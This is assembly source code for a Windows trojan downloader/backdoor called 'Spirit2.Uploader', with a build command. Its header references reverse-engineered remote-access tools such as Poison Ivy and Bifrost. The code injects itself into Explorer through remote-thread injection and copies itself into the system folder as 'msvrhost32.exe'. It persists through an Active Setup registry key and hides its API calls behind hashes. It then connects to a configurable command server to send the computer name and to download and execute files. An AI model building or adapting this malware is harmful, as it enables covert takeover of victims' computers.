;=============================================== ; Spirit2.Uploader Coder:Anskya ; Email: Anskya@Gmail.com ; ; Spirit2.Uploader.code:100%(Server)-------code inject ; Spirit3.b1.Uploader.code:100%(Server)----up ; Spirit3.b2.Uploader.code:100%(Server)----up ; Spirit4.Uploader.b1.code:100%(Server)----up ; C-One 1.0.0.0.code:100%(Server----shit!)-code inject(no elirt) ; Bifrost.1.102.code:100%(Server)----------dll (memory pe loader) inject(use elirt)+plugin memory loader ; Poison Ivy 2.0.0-2.14:100%(Server)-------code inject(no use elict)-code plugin ; tequila bandita 1.3b2.code:100%(Server)--dll Memory Inject ; Nuclear Seed 1.1.code:100%(Server+Client)----process hjeck ; ; Bifrost.1.21.code:30%(Server)------------dll (memory pe loader) inject(use elirt) ; Flux.1.01.code:70%(Server)---------------code inject(use elirt)-code plugin ; Poison Ivy 2.20-2.30.code:10%(Server)----code inject(no use elict)-code plugin ; ; Thank:drocon,coban2k,iciko,ksv,Gargamel,shapeless,Caecigenus,stm ; ; 完全原版逆向...编译器:Nasm 0.39.38 or Yasm 0.61 ; nasmw -fbin Spirit2a.asm -o Spirit2a.exe ;=============================================== [BITS 32] %define CODE_BASE 1000h %define DATA_BASE CODE_BASE %define RVADIFF 1000h-200h %define imagebase 00400000h %define reloc RVADIFF+imagebase %define MAX_PATH 260 MZ_Header: .magic dw "MZ" .cblp dw 0 .cp dw "IC" .crlc dw "IK" .cparhdr dw "O" .minalloc dw 0 ;.cblp dw "[C" ;.cp dw "]A" ;.crlc dw "ns" ;.cparhdr dw "ky" ;.minalloc dw "a" PE_Header: .Signature dd "PE" .Machine dw 14Ch .NumberOfSections dw 1 IAT_User32: .TimeDateStamp dd 0 .PointerToSymbolTable dd 0 .NumberOfSymbols dd 0 .SizeOfOptionalHeader dw 0E0h .Characteristics dw 103h Optional_Header: .Magic dw 10Bh .MajorLinkerVersion db 0 .MinorLinkerVersion db 0 .SizeOfCode dd CODE_BASE .SizeOfInitializedData dd 0 .SizeOfUninitialzedData dd 0 .AddressOfEntryPoint dd code+RVADIFF .BaseOfCode dd 1000h ;.BaseOfData dd DATA_BASE .lfanew dd 0Ch ;align 16, DB 0 .ImageBase dd imagebase .SectionAlignment dd 1000h .FileAlignment dd 200h .MajorOperSystemVersion dw 4h .MinorOperSystemVersion dw 0h .MajorImageVersion dw 0h .MinorImageVersion dw 0h .MajorSubsystemVersion dw 4 .MinorSubsystemVersion dw 0 .Reserved1 dd 0h .SizeOfImage dd 2000h .SizeOfHeaders dd import .CheckSum dd 0h .Subsystem dw 2 .DllCharacteristics dw 0h .SizeOfStackReserve1 dd 100000h .SizeOfStackCommit1 dd 2000h .SizeOfStackReserve2 dd 100000h .SizeOfStackCommit2 dd 1000h .LoaderFlags dd 0h .NumberOfRvaAndSizes dd 10h Data_Directories: .Export times 2 dd 0h .Import dd import+RVADIFF, import_end-import .Resource times 2 dd 0 .Exception times 2 dd 0h .Security times 2 dd 0h .Relocation times 2 dd 0h .Debug times 2 dd 0h .Architecture times 2 dd 0h .GlobalPtr times 2 dd 0h .TLS times 2 dd 0h .LoadConfig times 2 dd 0h .BoundImport times 2 dd 0h .IAT times 2 dd 0h .DelayImport times 2 dd 0h .ComDescriptor times 2 dd 0h .Reserved times 2 dd 0h ;PE节----至少要有一个PE节 sections: .SectionName db "spirit2",0 .VirtualSize dd 1000h .VirtualAddress dd 1000h .SizeOfRawData dd code_end-import .PointerToRawData dd import .PointerToRelocations dd 0h .PointerToLinenumbers dd 0h .NumberOfRelocations dw 0h .NumberOfLinenumbers dw 0h .Characteristics dd 0E00000D0h ;============================================================================================ ; 循环启动自身.查找Explorer Find_Process: push 11h pop ecx @loop_push1: push edi loop @loop_push1 push esp push esp push 7 pop ecx @loop_push2: push edi loop @loop_push2 lea eax, [reloc + __GetCurrentPath] push eax call [reloc + __CreateProcessA] push 11h pop ecx @loop_pop: pop eax loop @loop_pop popad retn ; Win9x插入函数 Inject_Win9x: push 40h push 08003000h push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH * 2) push edi call [reloc + __VirtualAlloc] ; Write Memory push 8 push edi push eax push edi push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH) lea edx, [reloc + __RemoteCodeStart] push edx push eax push esi call [reloc + __WriteProcessMemory] ; CreateRemoteThread For Win9x call [reloc + __GetCurrentProcessId] xor eax, [fs:030h] xor ebx, eax mov esi, [reloc + __DebugActiveProcess] ; 搜索CreateRemoteThread9x @search_crt9x: inc esi cmp dword [esi], 0E857FFFFh jnz @search_crt9x lodsd lodsd add eax, esi push -1000h push ebx call eax ; 搜索OpenThread9x push edi push eax mov esi, [reloc + __OpenProcess] @search_opt9x: inc esi cmp dword [esi], 0E832FF50h jnz @search_opt9x lodsd lodsd add eax, esi push ebx call eax popad retn dll002 db "USER32",0 __ExplorerWindow db 'shell_traywnd',0 align 200h, DB 0 import dd 0 dd 0 dd -1 dd dll001+RVADIFF dd api001+RVADIFF times 5 dd 0 ;NULL DLL ENTRY dll001 db "KERNEL32.DLL",0 ;kernel32 apis api001 dd api101+RVADIFF dd 0 api101 dw 0 db "ExitProcess",0 import_end: code: pushad lea ebx, [reloc + __LoadLibraryA] call GetKernel32 lea eax, [imagebase + dll002] push eax call [reloc + __LoadLibraryA] call GetFunctions xor edi, edi ; 获取自身路径 push MAX_PATH lea eax, [reloc + __GetCurrentPath] push eax push edi call [reloc + __GetModuleFileNameA] push 1024 call [reloc + __Sleep] ;Debug ;call RemoteCode ; 查找Explorer.exe窗口 push edi lea eax, [imagebase + __ExplorerWindow] push eax call [reloc + __FindWindowA] test eax, eax jnz @Inject_Process ; 启动自身,再次查找Exlorer窗口 lea eax, [imagebase + Find_Process] jmp eax ; 注入代码To 远程进程(Explorer) @Inject_Process: push eax push esp push eax call [reloc + __GetWindowThreadProcessId] pop eax xchg eax, ebx push ebx push edi push 01F0FFFh call [reloc + __OpenProcess] xchg eax, esi ; 判断是否为Win9x call [reloc + __GetVersion] cmp eax, 080000000h jb @Inject_WinNT ; 执行Win9x插入 lea eax, [imagebase + Inject_Win9x] jmp eax @Inject_WinNT: push 40h push 3000h push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH * 2) push edi push esi call [reloc + __VirtualAllocEx] push eax push esp push edi push edi push eax push edi push ((__RemoteCodeEnd - __RemoteCodeStart) + MAX_PATH) lea ebx, [reloc + __RemoteCodeStart] push ebx push eax push esi call [reloc + __WriteProcessMemory] push edi push edi push esi call [reloc + __CreateRemoteThread] pop eax popad retn ;============================================= ; RemoteCode __RemoteCodeStart: RemoteCode: pushad call @Start @Start: pop ebx add ebx, (__LoadLibraryA - @Start) ; Load WS2_32 push '32' push 'ws2_' push esp call [ebx + (__LoadLibraryA - __LoadLibraryA)] ; LoadLibraryA call GetFunctions ; Load Advapi32 push 0 push 'pi32' push 'adva' push esp call [ebx + (__LoadLibraryA - __LoadLibraryA)] ; LoadLibraryA call GetFunctions push 5 pop ecx @@Loop_Pop: pop eax loop @@Loop_Pop ; 安装文件 ; 获取安装目录 push MAX_PATH lea edi, [ebx + (__GetCurrentPath - __LoadLibraryA) + MAX_PATH] push edi call [ebx + (__GetSystemDirectoryA - __LoadLibraryA)] push edi add edi, eax lea esi, [ebx + (__SetupFileName - __LoadLibraryA)] ; 连接文件名 push 15 pop ecx rep movsb pop edi ; 删除已经存在的安装文件 ; push edi ; call [ebx + (__DeleteFileA - __LoadLibraryA)] ; ; Copy File push 0 push edi lea eax, [ebx + (__GetCurrentPath - __LoadLibraryA)] push eax call [ebx + (__CopyFileA - __LoadLibraryA)] ; 填写注册表 ; 打开键值 push esi lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)] push eax push 080000002h call [ebx + (__RegCreateKeyA - __LoadLibraryA)] ; ; 填写键值 push 0b4h push edi push 1 push 0 lea eax, [ebx + (__ActiveSetup - __LoadLibraryA)] push eax push dword [esi] call [ebx + (__RegSetValueExA - __LoadLibraryA)] ; 关闭句柄 push dword [esi] call [ebx + (__RegCloseKey - __LoadLibraryA)] ; 创建Socket连接 ;WSAStartup sub esp, 0800h mov edi, esp push edi push 1 call [ebx + (__WSAStartup - __LoadLibraryA)] @Loop_Online: ;closesocket push ebp call [ebx + (__closesocket - __LoadLibraryA)] ;socket push 6 push 1 push 2 call [ebx + (__socket - __LoadLibraryA)] ; 删除注册表 xchg eax, ebp lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)] push eax push 080000001h call [ebx + (__RegDeleteKeyA - __LoadLibraryA)] @Loop_connect: ;Sleep push 0800h call [ebx + (__Sleep - __LoadLibraryA)] ; 终于可以连接了 lea eax, [ebx + (__MasterAddress - __LoadLibraryA)] push eax call [ebx + (__gethostbyname - __LoadLibraryA)] test eax, eax je @Loop_connect ; 压入端口开始连接 mov eax, dword [eax + 0ch] mov eax, dword [eax] push dword [eax] push 0FE120002h ;端口值---使用htons转换后的数值--写生成器时注意 pop dword [edi] pop dword [edi + 4] ;connect push 010h push edi push ebp call [ebx + (__connect - __LoadLibraryA)] jnz @Loop_Online push 0 ;GetComputerNameA push 010h push esp push edi call [ebx + (__GetComputerNameA - __LoadLibraryA)] jmp short @Send_OnlineInfo ; 循环接受数据包 @Recv_Buffer: push 0 push 0800h push edi push ebp call [ebx + (__recv - __LoadLibraryA)] inc eax je @Loop_Online dec eax je @Loop_Online mov dh, byte [edi] inc edi call @Create_File dec edi ; 数据发送函数 @Send_Buffer: push 0 push 2 @Send_OnlineInfo: push edi push ebp call [ebx + (__send - __LoadLibraryA)] @Send_Loop: jmp short @Recv_Buffer ; 解析接受到的命令----看表头注明函数功能 @Parse_Cmd: @Parse_Done: mov byte [edi], 78h retn @Create_File: dec dh jnz @Wirte_File xor ecx, ecx push ecx push ecx push 2 push ecx push ecx push 040000000h push edi call [ebx + (__CreateFileA - __LoadLibraryA)] inc eax je @Parse_Done dec eax xchg eax, esi retn @Wirte_File: dec dh jnz @Close_File dec eax push 0 push ecx push eax push edi push esi call [ebx + (__WriteFile - __LoadLibraryA)] test eax, eax je @Parse_Done retn @Close_File: dec dh jnz @Parse_UnInstall push esi call [ebx + (__CloseHandle - __LoadLibraryA)] @Execute_File: push 0Ah push edi call [ebx + (__WinExec - __LoadLibraryA)] cmp eax, 31 jns @Parse_Done retn @Parse_UnInstall: dec dh jnz @Close_Socket ; 删除注册表 lea eax, [ebx + (__ActiveRegedir - __LoadLibraryA)] push eax push 080000002h call [ebx + (__RegDeleteKeyA - __LoadLibraryA)] ; 删除安装文件 lea eax, [ebx + (__GetCurrentPath - __LoadLibraryA) + MAX_PATH] push eax call [ebx + (__DeleteFileA - __LoadLibraryA)] jmp @Close_SocketProc @Close_Socket: dec dh jnz @Parse_Ping @Close_SocketProc: push ebp call [ebx + (__closesocket - __LoadLibraryA)] pop eax ; exit @Exit_Loop: add esp, 0800h popad retn @Parse_Ping: dec dh jnz @Parse_Is9x mov byte [edi], 32h ret @Parse_Is9x: dec dh jnz @Parse_Exit call [ebx + (__GetVersion - __LoadLibraryA)] cmp eax, 080000000h jnb @Parse_Exit inc byte [edi] @Parse_Exit: retn ;============================================= ; get kernel32 base GetKernel32: mov eax, [fs:30h] test eax, eax js @@os_9x @@os_nt: mov eax, [eax + 0ch] mov esi, [eax + 1ch] lodsd mov eax, [eax + 08h] jmp short @@finished @@os_9x: mov eax, [eax+034h] mov eax, [eax+0b8h] @@finished: ;retn ; HashGetProcAddress thank coban2k GetFunctions: xchg eax, ebp mov eax, dword [ebp+03Ch] ; PE mov eax, dword [ebp+eax+078h] ; Export Table RVA lea esi, [ebp+eax+018h] ; Export Table VA+18h lodsd xchg eax, ecx ; NumberOfNames lodsd ; AddressOfFunctions push eax lodsd ; AddressOfNames add eax, ebp xchg eax, edx lodsd ; AddressOfNameOrdinals add eax, ebp push eax xchg esi, edx @next_func: lodsd add eax, ebp xor edx, edx @calc_hash: rol edx, 3 xor dl, byte [eax] inc eax cmp byte [eax], 0 jnz @calc_hash mov edi, ebx @scan_dw_funcs: cmp dword [edi], edx jnz @Skip_function mov eax, dword [esp] movzx eax, word [eax] shl eax, 2 add eax, dword [esp+4] mov eax, dword [eax+ebp] add eax, ebp stosd @Skip_function: scasd cmp dword [edi], 0 jnz @scan_dw_funcs add dword [esp], 2 loop @next_func pop eax pop eax ret ; =======API Hash Address __FunAddress: __LoadLibraryA dd 0A412FD89h __WinExec dd 0016EF74Bh __CreateProcessA dd 08EF94368h __Sleep dd 00005F218h __DeleteFileA dd 049462A7Bh __GetModuleFileNameA dd 060F43F1Bh __GetSystemDirectoryA dd 0B8E579C1h __CopyFileA dd 04F182A69h __CreateFileA dd 038C62A7Ah __WriteFile dd 058D8C545h __CloseHandle dd 0C0D6D616h __closesocket dd 0C0CBAF87h __connect dd 001BDA62Ch __gethostbyname dd 0208651E9h __send dd 00000FC54h __socket dd 0003FAF9Ch __recv dd 00000FE2Eh __WSAStartup dd 0E250EADAh __RegSetValueExA dd 09775A748h __RegCreateKeyA dd 0A718D938h __RegDeleteKeyA dd 08928D938h __RegCloseKey dd 0C6E06B86h __GetComputerNameA dd 0BA2070DFh __GetVersion dd 052ED5F54h __FindWindowA dd 0ABEEB02Bh __GetWindowThreadProcessId dd 0850BA256h __OpenProcess dd 029BF2CBBh __VirtualAllocEx dd 0C5B429FAh __WriteProcessMemory dd 0B04AD555h __CreateRemoteThread dd 04A5F66C2h __DebugActiveProcess dd 031978FE3h __GetCurrentProcessId dd 06D5EA21Eh __VirtualAlloc dd 0AB16D0AEh __ActiveSetup db 'StubPath',0 ;__MasterPort dd 0FE120002h __MasterAddress db '127.0.0.1',0 db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 __ActiveRegedir db 'SOFTWARE\Microsoft\Active Setup\Installed Components\' __ActiveRegHex db '{2A202488-F02D-11cf-64CD-1123AFEECF20}',0 __SetupFileName db '\msvrhost32.exe',0 __GetCurrentPath: __RemoteCodeEnd: %define RemoteCodeSize $ - RemoteCode code_end: